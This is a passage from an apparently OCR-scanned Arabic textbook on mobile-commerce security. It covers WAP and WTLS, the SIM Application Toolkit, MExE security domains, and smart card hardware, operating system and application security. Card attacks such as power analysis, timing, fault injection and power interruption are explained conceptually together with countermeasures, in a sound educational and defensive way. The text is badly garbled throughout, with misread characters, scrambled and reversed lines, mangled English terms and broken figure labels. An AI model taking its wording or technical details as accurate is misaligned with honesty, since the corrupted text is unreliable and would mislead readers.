وخدمات بنكية » وخدمات دليلية وتطبيقات إنترانيت (intranet)‏ متحدة . 


ومثل e HTTP‏ فإن WAP‏ مؤسسة على نموذج موكل / خادم . تطبيق الوکل على 
التليفون المحمول ( أو أى أداة محمولة أخرى ) على متصفح دقيق (microbrowser)‏ 
والذی كما یتضمن آسمه y‏ يحتاج Pes‏ من موارد حسابات التليفون المحمول المحدودة : 
و WAP‏ مستقلة عن حامل الشبکة وکذلك مستقلة عن أداة / الحمول Gilly e‏ 
يساعد على هجرة التطبیقات من SMS‏ أو GPRS JJ HSCSD‏ . 

وبناء على الموارد المحدودة للأدوات المحمولة » أى : 
© عرض a2‏ ووسائل دخل محدودة 9 للمستخدم : 
© ربط شبكة حزمة ضيقة . 
© ذاكرة محدودة وموارد حسابية محدودة ) موكل رقيق ( 2 

المحتويات التى ستشاهد بواسطة مشترك محمول يجب أن تكون بحجم محدود » 
ولكن مع ذلك ذات معنى » والذى et‏ صفحات الشبكة (Web)‏ المعتادة غير 
مناسبة للتجارة المحمولة (m-commerce)‏ . ولهذا السبب » فإن لغة أقرب ما تكون 
للكال (Wireless Markup Languag)‏ وهی aad‏ نص خيارية لما نفس الدور IA‏ 
WAP‏ مثل Java Script‏ لموكلى (WAP‏ . مشترك مكتبة تشفيرية ل WMLS Script‏ © 
علد » يعرف نص 35 (sign text)‏ وظيفة توقیع وتشفیر النقل لحتوی موقع ۱ olas‏ 
الوظيفية تكمل خدمات الأمن التى يقدمها أمن طبقة نقل لاسلكية (Wireless‏ 
Transsport Lael Security : WTLS) WAP‏ ها بنيان بطوابعه - شکل (۲-۹). 
الطبقات ليست صارمة فى تكوينها لأن التطبيقات الخارجية يمكن أن تصل لكل 
الطبقات مباشرة 5( عدا WDP‏ . بيئة التطبيق اللاسلكية (WAR)‏ تتضمن بيئة 
متصفح دقيق مع WML‏ . حدمات التليفون اللاسلكى ومشتركات البرجة WTA)‏ 
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تطبيق التليفون اللاسلكى » ومجموعة من محتوى معرف جيدًا ( لنسق محتوى ) [ مثل » 
صور وسجلات دليل التليفونات ) . بروتوكول الدورة اللاسلكية (WSP)‏ يقدم مشترك 
لنوعين من دورات الندمات e‏ واحدة بدون ربط على WTP‏ وواحدة بربط موجه على 

WSP/B WDP‏ يتضمن وظيفية HTTP/1.1‏ والذى يسمح لوكالة WAP‏ يربط وکیل 
محمول بخادم HTTP‏ عیاری . بروتوكول النقل اللاسلكى (WTP)‏ ينفذ أعلى بروتوكول 
شكل بيانات ( أى بروتوكول شكل بيانات WDP SLY‏ أو (UDP‏ . 








WAP lands (1.9) شكل‎ 
Wireless Application Environment (WAE) 
©) 
L en . بيئة تطبيق لاسلكية‎ (1) 
(Y) Wireless Session Protocol [WSP) 
. بروتوكول دورة لاسلكية‎ )۲( 
(Y) Wireless Transaction Protocol (WTP) 1 
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JE عبارة عن بروتوكول وزن منخفض للتنفيذ فى موكلين رقيقين . طبقة أمن‎ WTP 
سبق الكلام عنه . ويمكن استعماله فى كلاشيكات 1۳ أو التى‎ (WTLS) اللاسلكى‎ 
ops. fold لیست مستقلة عن‎ lel gh) eu بروتوکول‎ ) IP لیست‎ 
WAP معتاد . موكل‎ WAP يبين تشكيل‎ (EN) المختلفون سبق الكلام عنهم شكل‎ 
والمربوط بشبكة لاسلكية وتقدم عتوی‎ WAP المحمول يمكنه الاتصال مباشرة بخادم‎ 
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Uli يتم‎ WML بيانات‎ of » وبسبب ربط الشبكة ذات الحزمة الضيقة‎ . WML 
فيجب أن‎ «HTML UWL فى نسق ثنائى . وإذا آراد مستخدم المحمول أن يصل‎ 
فى الانترنيت يمكن أن يكون‎ Web وخادم‎ . HTML بمرشح‎ WML تترجم أولاً إلى‎ 
هذه الحالة » يجب أن يذهب الربط خلال وكالة‎ dy . أيضًا‎ WML مزود محتوى‎ 
. WML والتى تقوم بالترجمة للثنائی نسق‎ WAP 


شكل )£04 ) تشكيل WAP‏ معتاد 


Web WAP | (Y) 
m lee] = 3 7 an (N) 
Bun Fr "=" network“, 








WML / WAP 
HTML m] WML monle 
HTML elient 
7 سس‎ 
EM wee 5 
(2) 
. شبكة لاسلكية‎ (1°) . WAP وكالة‎ (r) . Web خادم‎ (1) 
۰۷۷۸۳ محمول‎ JS ga (1) -gIGWML (0) .HTMLas yo(t) 


أمن طبقة النقل اللاسلكية : 

مواصفات أمن طبقة النقل اللاسلكى (WTLS)‏ تعرف بروتوكول أمن يشبه كثيرا 
0 . ومثل TLS‏ فان WTLS‏ تقدم توثيق متاثل (Peer)‏ » وخصوصية بيانات » 
وتكامل بيانات . وبين| TLS‏ يجب أن تكون تطبيقات عبر بروتوكول نقل يعتمد عليه » 
فان WTLS‏ يمكن أن يكون بطبقات عبر بروتوكول نقل لا يعتمد عليه (أى أنه يضيف 
شكل بيانات كدعم ) . lis‏ بروتوكول تبادل التعلیات (handshake)‏ ( أى sl‏ 
لنغيرات أمن » فان تبادل الفتاح والتوثيق يجب أن يعتمد عليها Gl‏ . ويتم الوصول 
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للك سجلات TLS‏ داخل الرسالة (أى وحدة بيانات خدمة (SDU‏ على يد 
¿dos‏ وبإغادة الارسال ورسائل الاقرار عل اليك الاهری . 

بالاضافة لذلك » فان WTLS‏ تقرب بروتوکول تبادل AS » 118 Adal‏ 
الختصرة وکذلك التی تودی آقرب تلکمال N‏ معدلات البیانات فى شبكة محمول آقل 
bes‏ من التی على الانترنيت . كذلك ۰ فان ۷۷15 یعرف أيضًا إنعاش مفتاح 
دینامیکی بحیث أن مفاتیح التشفیر یمکن تبادها خلال ربط تم فعلا . هذه الخاصية 
مفيدة UY‏ تتجنب تبادل التعلیات الفوقی . کذلك ۰ تعطی آمن أعلى OY‏ المفاتيح 
لیست معرضة شجیات قوة وحشية نی أى وقت ناء رط آمن . 
وحدة تحدید WAP‏ : 

وحدة تحدید (WAM WAP)‏ تؤدى WTLS‏ ووظائف ¿al‏ طبقة تطبیق (مثل 
توقيع رقمی لتوثیق ۰ تبادل مفتاح )۰ وتعمل کاختزان آمن لشخصية مستخدم 
ومعلومة تخص الامن ( مثل مفاتیح خاصة وأمنة التشفير ) ۰ WIM‏ يجب أن ينفذ كأداة 
مقاومة للعبث ‏ لذلك فان الاختیار المنطقى هو بطاقة ذكية (مثل بطاقة (SIM‏ والتی 
یمکن إدخاها داخل آداة عمولة . وهیکل معلومة البطاقة مؤسس على مواصفات 
توکین الشفرية 15 # PKCS‏ . 
مواضیع WML (pol‏ : 

لغة (Wireless Markup Languag : WML)‏ هی لغة تحديد سعر مؤسسة على 
XML‏ ومصممة للاستعمال فى أدوات ‚Une‏ سطح "WML deck"‏ والذى يحتوى 
على بطاقة WML‏ واحدة أو ¿SÍ‏ يشابه صفحة HTML‏ . كذلك تحدد بواسطة URI‏ 
وتتضمن وحدة إرسال وبعد تحميل مسطح (deck)‏ » فإن المتصفح الدقيق يعرض 
البطاقة INN‏ . 

WML‏ آلية إدارة حالة لوكيل الستخدم ( أى المتصفح الدقيق ) متضمنة متغير 
(Variable)‏ يمكنه تغيير خواص ومحتوى بطاقة WML‏ أو سطح (deck)‏ . وتختزن 
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قيمتها فى حيط المتصفح (browser cortext)‏ . والمستخدم قد يعتبر قيم متغيرات محددة 
على dole Ul‏ لذلك يجب ألا يكون EL‏ لخدمة زائدة إسترجاع المعلومة الخاصة . 

عنصر الوصول يحدد تحكم الوصول للسطح كله ( أى تحكم وصول مستوى / 
السطح ) . (domain) Je‏ خواص عنصر الوصول والمسار (path)‏ تعرف أى الأسطح 
gM‏ بسو لما بالوصول لهذا السطح . وعندما يبحر الستخدم من سطح واحد 
اس Ob‏ الية تحكم الوصول تعرف إذا ما كان سطح جهة الوصول يمكن الوصول له 
(أى السطح المشار إليه) . وإذا هيأت خاصية sendreferer‏ إلى صحیح "TRUE"‏ « 
يجب على التصفح الدقيق أن يحدد ch URI‏ المسار . بالأخص e‏ الخادم (Servert‏ 
( الذى يقدم سطح جهة الوصول ) قد يؤدى SE‏ وصول مؤسس على URI‏ وبالتال 
يحد من تهیثات URIS‏ المسموح لأسطحها بأن تشير لسطح الخادم . 
طاقم أدوات تطبيق ¿SIM‏ 

بطاقة SIM‏ لعبت Vol‏ دور متأثر (passive)‏ مزودة المستخدم بالتوثيق الضرورى 
للوصول للشبكة ومفاتيح التشفير للوصول الخصوصية الكلام . طاقم أدوات تطبيق 
(SIM Application Toolkit) SIM‏ جزء من معيار (GSM11.14) GSM‏ يمد دور 
البطاقة بيحيث تصبح مشترك بين الاداة المحمولة والشبكة . طاقم أدوات SIM‏ برغم 
تطبيقات البطاقة الذكية لشبكات GSM‏ . وهو مؤسس على أساس موكل/ عميل e‏ 
SMS‏ عبارة عن حامل خدمة . وف المستقبل ستستعمل آليات نقل أخرى مثل 
USSD‏ أو GPRS‏ . ومع طاقم أدوات SIM‏ » من Jar ¿Sol‏ بطاقة SIM‏ شخصية 
لتحديث وظائف / خدمات SIM‏ الوجودة ولتركيب وظائف/ خدمات جديدة 
بالتحميل الأدنى لبيانات عبر الشبكة . وهذا قد تم عمله bole‏ بإضافة أو تعديل 
بيانات فى ملفات البطاقة والسجلات e‏ وليس بالتحميل الآدنى (downloading)‏ 
شفرة قابلة للتنفيذ . ds‏ نوفمبر ۰۱۹۹۹ ETSI‏ تبنت Java Card Sl,‏ للتضمين فى 
طافم أدوات SIM‏ . والبيانات المحمية بالتشفير مرسلة عبر مشترك اهواء برسائل SMS‏ 
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المستعملة كأوعية (containers)‏ . ومع أن بعض الناس ترى طاقم أدوات SIM‏ 
و WAP‏ كمنافس ۰ فان المفهومين یمکنها فى الحقيقة تكملة بعضها . على وجه 
الخصوص ۰ فان طاقم أدوات SIM‏ يمكن إستعماله لتطبيقات ذات أمن del‏ » مثل 
Shel‏ بنكية بالمحمول > وكذلك خدمات المعلومات بمحتوى لا تتغير BES‏ جذّا » مثل 
الخطوط الساخنة » ودلائل الشركات والصفحات الصفراء . ومن الناحية GAM‏ فان 
WAP‏ تناسب أفضل للخدمات الديناميكية أكثر مثل تصفح الأنترنيت والوصول 
لعلومات تتغير بصفة مستمرة . 
إحتياجات الأمن فى طاقم أدوات (GSM02.48,03.48) SIM‏ مواضيع آمن طبقة 
نقل معتادة مثل توثيق (peer) Plas‏ وتكامل رسالة وکشف إعادة عرض وتتكامل تتابع 
وبرهان الاستلام وحصوصية الرسالة . أساسًا » فان كل رسالة تطبيق تقسم إلى قوالب 
(packets)‏ والتى تؤمن a‏ بحماية الحمولة الصافية BLA) (payload)‏ رؤوس أمن . 
وبرهان التنفيذ مطلوب أيضًا لتأكيد تطبيق الارسال ( مثل تطبيق بنك ) بأن تطبيق 
الاستقبال ( مثل تطبيق أعمال البنوك على بطاقة (SIM)‏ قد أدى عمل بدء بإرسال تطبيق 
. وهذا البرهان يجب أن يزود عند طبقة التطبيق » لذلك فلا توجد آلية معرفة له فى 
مواصفات GSM‏ . 
dig‏ تنفيذ تطبيق محطه محموله (MEXE)‏ : 
(Mobile Station Application Executtion Environment ) MExE‏ وهو 
جزء جديد بمعيار (GSMO2.57)GSM‏ وسيعطى طريقة برنامج [(Platform)‏ 
مستقلة وذات عيارية 7 
© نقل تطبيقات صغيرة (applets)‏ ومحتوى بين مزود خدمة وأداة محمولة . 
© تنفيذ تطبيقات صغيرة (واه01ه) نی Las dy‏ عيارية خلال معدة محمولة » SIM‏ 
sl)‏ جزء من آداة حمولة > ولکن SIM‏ شخصية فقط . 
۳ عبارة عن حامل شبكة مستقل » لذلك یمکن تطوير حمالين ختلفین (مثل 
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GPRS . SMS‏ ) ويمكن أن تجعل أداة مدعمة ب WAP‏ قادرة على تقديم مدى 
عريض من الخواص بأمن آکبر وكذلك مدونة أكثر » بالسماح iey‏ تطبيق کل 

. داخل الأداة المحمولة‎ Java Virtual Machine) الواقعية‎ Java äl تبنى‎ MEXE 
لتلك المعنونة سابقًا . وأساسًا » يجب تنفيذ‎ Ges لذلك » فان مواضيع الامن تشبه‎ 
أى خلال مجموعة مقيدة جدًا‎ ( (sandbox) شفرة غير موثوق ما فى صندوق رمال‎ 
هى تصريحات مضمونة‎ (trusted code) J لتصريحات الوصول ) . والشفرة الموثوق بها‎ 
. . (security domain) عل اسان على نوع التوكيل الذى تم حدیده لمجال الأمن‎ 
: المجالات الأربعة التالية للأمن معرفة‎ 


© ال عامل الأمن (security operator domain)‏ للشفرة الموكلة لعامل الشبكة 


© عال صانع الأمن (Security Manufacturer Domain)‏ للشفرة الموكلة بواسطة 
۵ آمن غير موثق (Security Untrusted)‏ لشفرة غير موثقة . 
MEXE‏ ستمدد PES‏ وظيفية بطاقات WAP . SIM‏ ۰ بذلك یمکن رژیتها کتطبیق 
ینفذ فى MEXE‏ . 
MEXE‏ هو هدف عند Abt‏ الحمول ككل » والذی یتضمن كلا معدة الحمول» 
SIM‏ ) على عکس lb‏ آدوات تطبیق e SIM‏ والستهدفة عند بطاقة SIM‏ فقط ) . 
وجهه نظر : (Outlook)‏ 
من المتوقع أن آدوات الحمول ( خاصة أجهزة التلیفون المحمولة ) ستطور فى برنامج 
ذو LAN‏ القصوی للدفع الالکترونی (e-payment)‏ وأعمال البنوك الالکترونية 
(e-banking)‏ ى الانترنيت . ويوجد عائق هو أن توثيق العميل مؤسس على التوقيعات 


۱۳۱ 


الرقمية لا تعمل جيدًا حاليًا ( أى فى ربط مع ۷4۴ ) . والعائق FV‏ هو أن الأدوات 
الحمولة لا تعطى برنامج (platform)‏ حقيقى متعدد التطبيقات ( مع تضمين كل 
الأمن) . فمثلاً » یوجد تليفون محمول مزدوج الحيز (dual slot)‏ بواسطة موتورولا » 
والذى يخصص فيه حيز واحد لبطاقة SIM‏ » والاحر لبطاقة ذكية لطرف ثالث ( أى 
مزود دفع أو توقيع الكترونى ) . وليس من الواضح إذا كان هذا JN‏ سيكون مقبولاً 
بواسطة بائعين آخرين . وعلى عكس مجالات أخرى كثيرة » فإن البحث والتطوير 
لتجارة المحمول (m-commerce)‏ بدأت بہيمنة ثم وبدأت بواسطة الصناعة . والسبب 
أن البرنامج platform‏ أى آدوات المحمول ) ذات استعمال منتشر فى الوقت الحالى » 
لذلك فان البائعين يطورون خدمات قيمة / مضافة جديدة ( مثل alt}‏ حمول خلال 
۳ ).وی هذه ALLL‏ » فإن النماذج القديمة مثل ال Web‏ متوافقة أساسًا . وهذا 
يسمح لتطور آسرع وموافقة مباشرة للعميل لأن المفاهيم الجديدة يجب أن يتم إختيارهاء 
ولأن العملاء متعرفين فعلاً بالخدمات . ومن الناحية الأخرى ۰ فان البرامج 
(platforms)‏ المحمولة ستكون محدودة نسييًا فى قدرتها ( عميل رقيق ) لفترة زمنية 
طويلة . وخلال إمكانيات فنية جديدة » مثل التحديد الطبيعى للعميل فى أى وقت 
ما فان platforms‏ المحمولة تؤدى لتطوير خدمات جديدة us‏ » وشخصية » كثير 
Lees‏ ترفع الخصوصية وتحتاج لمفاهيم أمن متقدمة حتى تكون مقبولة من جمهور 
عريض . 


۱۳۲ 


الباب العاشر 


أمن البطاقة الذكية 
Smart‏ 
Card‏ 


Security 


Smart Card Security : 


فى هذا الباب نتكلم عن البطاقة الذكية (Smart Card)‏ . ويمكن لمقتنى البطاقة 
الذكية أن يحملها لأى مكان » ولذلك فان البطاقات تعطيهم حمل فى طلب خدمات 
شخصية متعددة . وكذلك » فإن البطاقات الذكية هی واحدة من المفاتيح التى تساعد 
التكنولوجيا للتجارة المحمولة . وسنعطى فكرة عامة عن مواضيع أمن البطاقات 
الذكية . وبالإضافة لذلك » سنعطى كلام part‏ عن تكنولوجيا بطاقة Java Card bi-‏ 
ometrics‏ . 


toe 


تقديم : 

نمو البطاقة الذكية مرتبط بتطور لمنتجين : شريحة الحاسب SY)‏ الدقيق وبطاقة 
الشريط المغناطيسى . وهذان التطويران خرجا بالانتاج فى السبعينيات» عندما أعطى 
الصحفى الفرنسى رولاند مورينو فكرته فى وضع شريحة داخل بطاقة بلاستيك معتادة 
وسجل فكرته . والان» Ob‏ تطبيقات إستعال البطاقة الذكية تتضمن البطاقات 
التليفونية » وبطاقات التأمين الصحى » وتليفزيون الدفع USL‏ وتطبيقات N‏ 
البنوك والدفع » وتوثيق GSM‏ والتوقيع الرقمى . وللحصول عليى أحدث المعلومات 
عن البطاقة الذكية نقراً صفحة (homepage)‏ لاتحاد صناعة البطاقة الذكية Smart)‏ 
(Card Industry Association‏ . 

ومركبات البطاقة الذكية ¿lo‏ مثل ماهو للحاسب الآلى العتاد (normal)‏ : وهو 
عبارة عن حاسب آل دقيق (microcomuter)‏ كعنصر ذكى (أى وحلة المعالجة المركزية 
(CPU :‏ وذاكرة » وأجزاء الدحل / الخرج (input / output)‏ ومصدر التغذية . 


۱۳۵ 


وطدف الأداء الأفضل » فغالباً » يوجد معالج معاون للتشفير (مثل وحدة معالج معاون 
حسابى لحسابات المفتاح العام) . أجزاء الخرج / الدخل ومصدر التغذية يختلفان 
لأنواع البطاقات الذكية المختلفة : توجد بطاقات التلامس بملامسات معدنية e‏ 
وبطاقات عدم تلامس والتى تستعمل الربط الحثى وبطاقات ذكية فائقة بلوحة مفاتيح 
وشاشة عرض . وشريحة المعالج (processor chip)‏ للبطاقة الذكية المعتادة sy‏ على 
ثلاثة آنواع dake‏ للذاكرة ROM a‏ (ذاكرة القراءة فقط ) EEPROM‏ « أى ذاكرة 
قابلة للبريحة وا مسح كهر (electrically erasable programmable memory) GU‏ 
الاجراءات وخطوات حل التشفير إذا أمكن للأغراض العامة تختزن فى ROM‏ وعندما 
des‏ تطبق على Gb‏ تطبيق (PC Lio) (application terminal)‏ ویرغب فی 
الاتصالات ببطاقة ذكية » يجب إدخال البطاقة داخل قارىء البطاقة» (ويدعى Lal‏ 
طرف البطاقة أو أداة قبول البطاقة) . 

معايير البطاقة الذكية الدولية الأكثر أهمية هی ISO/IEC 7816 plo‏ . 
Lal deg «(ue cua all cls,‏ مراصفات EV‏ 
ومعيار EN1546‏ للحافظة الالكترونية للقطاع / البینی . ومواصفات EM۷‏ التى 
عرفتها Visa « Master card. Europay‏ تؤسس على 7816 ISO‏ بخواص ملكية 
إضافية لتلبية الاحتياجات المحددة للصناعة المالية . ول ¿GSM‏ فان مواصفات SIM‏ 
GSM/11.11 «= ME‏ هى السائدة أكثر . Ct pally‏ الذين يطورون تطبيقات طرفية 
للبطاقات الذكية » فان العروفة أكثر5؟1ططهى ۳0/56 حالياً Gy. OCF‏ ۳0/56 
فان ذلك التأكيد كان موجوداً على التشغيل البینی للبطاقات الذكية وقارىء البطاقات» 
وعلى تكامل تلك القارئات فى نظام تشغيل ميكروسوفت ويندوز. OCF‏ . أستفاد من 
بعض ol tl‏ الْتاحة Ans‏ خلال POSC‏ ومعاییر بطاقات ذكية آخری ورکزت de‏ 
مجالين جديدين : مستقلين عن نظام تشغيل المضيف (host)‏ ودعم شفاف لبطاقات 
dl‏ متعددة التطبيقات ومشاريع الادارة . 


مواضيع البدء والأمن يمكن تقسيمها لأزبعة مجالات : 


۱۳۹1 


© آمن جسم / البطاقة 

© آمن الحزء الصلب (hardware)‏ (أى الشريحة) 

© أمن نظام التشغيا 

pla 10‏ البطاقة 

معظم إجراءات أمن جسم/ البطاقة » مثل تزيين الصورة أو باللیزر (hologram)‏ 
مصممة للسماح بالفحص الآدمى إذا ما كانت البطاقة حقيقية (genuine)‏ والمصدر 
الأساسى للجزء التالى هو كتاب البطاقة الذكية بعمق أكثر .Rank/& EFFing i‏ 
أمن ce}‏ الصلب : 

شريحة البطاقة الذكية والتحکم الدقيق (microcontroller)‏ يجب أن تكون مقاومة 
للعبث بقدر الإمكان . وهذه الكفاءة تعنى أن تكاليف كسر آلية أمن الشريحة يجب أن 
تكون أعلى من الكسب العام الذى يؤدى ذلك . ويجب أن يكون من المستحيل قراءة 
البيانات السرية المختزنة على البطاقة » مثل مفاتيح التشفير » أو معالجات جهاز 
المراقبة (monitor)‏ التى تتم على البطاقة وبالتالى ترسم إختصار عن المعلومة التى 
تقاوم . امجوم ضد أمن الشريحة يمكن أن يحدث عند أى طور لدورة حياة البطاقة » 
تصنيع البطاقة والتطوير وعمل خخصوصية للبطاقة أو إستعمال البطاقة . وزيادة على 
ذلك امجوم باختلاف آنواعه يمكن حدوثه عندما تكون الشريحة نشطة sl] (active)‏ 
موصلة بمصدرر تغذية) أو غير نشطة . لذلك» يجب ملاحظة أن مقاومة العبث لا 
تحل مشاكل الأمن ويجب تحليلها بعناية وتحديثها عند الضرورة . 
لبيانات البطاقة. کذلك» فمن الضروری جدا تنفيذ الخواص الوثقة فقطء N‏ 
الخواص الغير موثقة لا تعتبر فى تقييم واختبار» وبذلك يمكنها فتح فجوة أمن. وكل 
شريحة تحصل على رقم متفرد » وهو فى حد ذاته لا يمكنه عمل حماية ضد ال هجوم › 


۱۳۷ 


بواسطة آليات توكيل مؤسسة على شفرات نقل والتى قد تكون خصصة للشريحة . 
لأنه لا توجد عملياً حماية طبيعية ضد الوصول. ولتلك الأنواع من المجوم» قد 
تستعمل أدوات معقدة clog‏ مثل الميكروسكوبات» وقاطعات الليزر ومعا لجات دقيقة 
(micromanipulotors)‏ . أو حاسبات الية سريعة e‏ للجس (probing)‏ والتحليل 
للمعالجات الكهربائية على الشريحة . والتحليل الاستاتیکی يمكن جعله صعب جداً 
خلال مبادىء 5 oe‏ خاص 5 

© طمر آليات كشف العبث » مثل مفاتيح غطاء أو كاشفات حركة للکشف ‏ مثل 
القطع أو الثقب . 

© بطانة معتمة إعاقة / واضحة لاعاقة الملاحظة المباشرة » والحس أو المعالجحة 
لسطح الشريحة . 

© هياكل دمية لارباك المهاجمين . 

© تصميم ذاكرة خاص وتشفير لاخفاء المحتويات à‏ 

© إخفاء وتشفير الباصات (buses)‏ لمنع التنصت. والآليات التى تحمى ضد 
التحليل الديناميكى تتضمن : 

© جهد كلب حراسة (watchdog)‏ والذى تقطع توصيل وحدة السوتش إذا لم يكن 
جهد التغذية فى حدود فترات عد‌ده. 

© آليات تبيىء للصفر أى متغیرات تمثل معلومة سرية أو خاصة (مثل مفاتیح 
التشفير) . 

© حماية ضد التعطل البيئى والتی تقفل الشريحة أو تبيىء متغيرات حساسة للصفر 
عندما تكون حالات بيئية خارج مدى التشغيل العتاد (أى تسخين الشريحة) . 


۱۳۸ 


اهجوم الديناميكى الذى يمكن أن يحدد أى أمر بطاقة يتم تنفيذه على البطاقة 
(وبذلك يبوح بالمعلومات الحساسة) مؤسس على تحليل قدرة تفاضلية (differential‏ 
„power analysis)‏ ويعمل امجوم إذا كانت الأوامر المختلفة لما استهلاك قدرة 
ختلف » لذلك فان آلية حماية واحدة ستستعمل لأوامر التى لها إستهلاك قدرة مشابه 
جداً فقط . والاحتمال الآحر » هو أداء نفس الحساب (مثل » خطوات حل تشفير) 
بطرق مختلفة متعددة » بحيث يتم فى كل مرة إختيار طريقة واحدة عشوائياً . 

افجوم الآخر والمعروف جيداً هو هجوم التوقيت (timing attack)‏ والذى فيه 
تطلب فترات زمنية بواسطة البطاقة لحسابات محددة يتم قياسها وتحليلها . فمثلا إذا 
شفرت البطاقة بيانات » AS‏ زادت الفروق فى فترة الحساب لفاتیح مختلفة وبيانات 
dake‏ » فان الأسهل تقليل مجموعة المفاتيح الممكنة . آلية AAI‏ هی جعل فترة 
الحساب المشفر مستقلة عن بيانات الدخل (خطوات حل - خالية من الضوضاء 
(noise - free algorithms)‏ . ألوان ال هجوم المؤوسسة على تحليل عطل تفاضل . 
(differential fault analysis)‏ تحاول مقاطعة تشغيل البطاقة (مثل » تغيير جهد 
التغذية أو تردد الساعة الخارجية » أو بتعريض البطاقة لأنواع مختلفة من الاشعاع) . 
وفى كل مرة تؤدى البطاقة حساب شفری Blas‏ أو غير متماثل » فان رقم ثنائى واحد فى 
المفتاح يتغير فى موضع ما . ونتائج متوالية هذه الحسابات » والتى هی مختلفة كلها OY‏ 
موضع الرقم الثنائى ake‏ فى كل منها » يتم تحليلها وتستعمل لحساب المفتاح (غير 
معروف سابقا) . و آلية AIAN‏ البسيطة هى جعل البطاقة تؤدى كل حساب مشفر مرتين 
وتقارن النتائج (يجب أن تکون متاثلة) . هذه الطريقة مستهلكة للوقت إلى حد ما . 
والاتجاه العملى أكثر هو إلحاق رقم عشوائى ER‏ بالبيانات التى ستشفر بحيث لا يمكن 
للمهاجمين تحليل النتائج المختلفة فى نفس النص البسيط (plaintext)‏ . ومن الطبیعی 
أن مولد الرقم العشوائى على البطاقة الذكية يجب ألا يكرر الارقام العشوائية مثالياً فى أى 
وقت أثناء دورة حياة البطاقة . 


۳۹ 


أمن نظام تشغيل البطاقة : 

تطوير نظام تشغيل البطاقة (card operating system : COS)‏ بدأ 1980 . 
وحالياً يوجد عشرات من نظم التشغيل فى الأسواق (مثل 05 Card‏ ۰ بواسطة سيمنز 
«Cyber Flex‏ بواسطة شلميرجية » و Mullos‏ بواسطة Maosco‏ ). يجب أن تكون 
صغيرة وبسيطة بقدر الإمكان (مثل (16K‏ وذلك fab‏ الاختبار والتقييم أسهل ليكون 
من الممكن التحقق من أن احتياجات الأمن العالية تم تلبيتها ۰ شفرة نظام التشغيل 
تكتب فى «ROM‏ والذى يعنى متى تم تعريف ROMEL‏ » ومن المحتمل ملايين من 
البطاقات آنتجت > فلا يمكن عمل تغيير بدون AB‏ كبير للصورة والنقود . وبنظم 
التشغيل العتادة dole‏ » فان رقعة (patch)‏ أو إصدار جدید يتم حریرها . وإذا كان 
ریز de‏ برامج معدلة للبطاقات » فإنها تکتب فى EEPROM‏ آغلی Les‏ . وعدد 
تشغیلات کتابه / شطب EEPROM‏ محدود [حتى105 ]. . بعض 0055 الأحداث » 
Multos«SIM Card « Java Card ft‏ تعطی API‏ وتسمح بتحمیل ادل 
(dowloading)‏ لشفرة تطبیق على البطاقة» ویوجد مدی للالیات الجعل نظام تشغیل 
بطاقة ذكية آمن بقدر الامکان . 

© أداء الأجزاء الصلبة (hardware)‏ والبرامج (software)‏ واختبارات الذاكرة 
مؤسس على جمع تحقيق (checksum)‏ عند dy‏ . 

© تصميم نظام التشغيل ببيكل وحدات أو بطبقات بحيث يكون إشعاع الخطأ أقل 
مایمکن . 

© دعم الاجزاء الصلبة لناطق ذاكرة منفصلة بقوة والتی تتضمن تطبیقات مختلفة 
(مثل : خلال اضافة وحدة إدارة ذاكرة (MMU‏ . 

© تحکم و صول مؤسس „PINS [E‏ 

الهجوم العروف جيداً هو مقاطعة فجائية لصدر التغذية » مثل نزع بطاقة من قارىء 


۱2۰ 


بطاقة . وإذا حدث عند dad‏ دقيقة» فان هذا النوع من الهجوم قد يسبب أعطال 
Seed BL‏ > يمكن تحميل حافظة الكترونية عند Gb‏ ثم تنزع من القارىء 
(reader)‏ عند اللحظة الضبوطت أى زيادة الاتزان على البطاقة . وإذا ieee ١‏ 
البطاقة بعد للطرفى أو لم يتم توليد سجل Sle‏ على البطاقة » فإن الطرفى سيعتقد أن 
تعامل الحمل لم يكن ناجحاً . وأفضل حماية ضد ذلك الحجوم هو استعمال التعاملات 
الذرية (atomic transactions)‏ دائ . وهذا يعنى أنه تم عمل تعامل إما el Suls‏ لا 
بتاتا . اليات الحاية یمکنها استع‌ال «علم عازل» (buffer flag)‏ فعندما تكون بيانات 
سيتم نسخها لبعض مواقع ذاكرة مستعدة فى العازل » فان العلم مهيأ (بيانات عازل 
ars‏ 

وإذ حدث وقطع توصيل مصدر التغذية (off)‏ عند هذه اللحظة  OB‏ المرة التالية 
على نظام التشغيل سيعرف أن بيانات العازل ومتى تم نسخ البيانات » وأن العلم غير 
مهيأ (unset)‏ (بيانات عازل غير صحيحة) . 

تحكم الوصول 3 معظم055© مؤسس عل آمر lia; .(Command based)‏ 
یعنی أن أمر sie‏ يجب أن day‏ بنجاح قبل الموافقة على الوصول (access)‏ . فمثلا » 
وصول کتابه یمکن قوله بعد التحقق من PIN‏ فقط بواسطة آمر due‏ 
(أىلا781811 ). والبدیل هو حکم وصول مؤسس على حالة (State - based)‏ 
أساساً » فان الالية 4515 الحركة (automaton)‏ تعرف والتی تحدد کل سریان التنفيذ 
السموح به [أى تتابعات الأوامر] على البطاقة . والاحتمال الثالث هو تحكم وصول شىء 
(موجه (object / oriented‏ والذى 43 الشىء (object)‏ الذی سيتم al‏ يحمل 
معلومات تحكم وصوله . 
أمن تطبيق البطاقة : 

NIP‏ يسمى تحقيق حافظ البطاقة (CHV)‏ وهو الآلية الأكثر شيوعاً للتحكم فى 
وصول لتطبيقات البطاقة الذكية . Boley‏ فإن حافظ البطاقة مسموح له BAY‏ محاولات 
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لكتابة PIN‏ الصحيح » والذی بعده تحجز البطاقة . لازالة الحجز ۰ يجب كتابة رقم 
اخر والمسمى مفتاح إزالة الحجز الشخصی (personal unblocking key : PUK)‏ . 
اتجاه PIN‏ به عيب PIN‏ أن قد يتم إدخاله عند طرف غير جدير بالثقة . ولتأكيد 
مواصفات حافظ Bly‏ آمن؛ تتوفر طرفيات بطاقات خاصة بوسادة PIN‏ متكاملة 
(مثل « 60 asy PIN wiley . (schlumberger's Reflex‏ نقل PIN‏ مشفر من 
البطاقة وبالتال تلغى احتمال التنصت . 

كل تطبيق بطاقة يجب أن يولد سجلات قبول Ob‏ تختزن على البطاقة بحيث إذا 
حدث خطأ فى أى شىء » فإن تتابع الأحداث يمكن أن يعاد تشييده . فمثلاً » إذا 
خرجت حافظة الكترونبة عن الدور » يمكن تحليل سجلات الفحص e‏ واخر اتزان 
صحيح يسترجع والكمية السائدة يعاد ادخارها . 

وعندما تتصل بطاقة ذكية بطر تطبيق (مثل طرف بنك) e‏ فان الطرفى يحتاج ole‏ 
من البطاقة آن توئق نفسها e‏ ولکن من الضروری غالا أن یکون الطرق موثقاً Lal‏ 
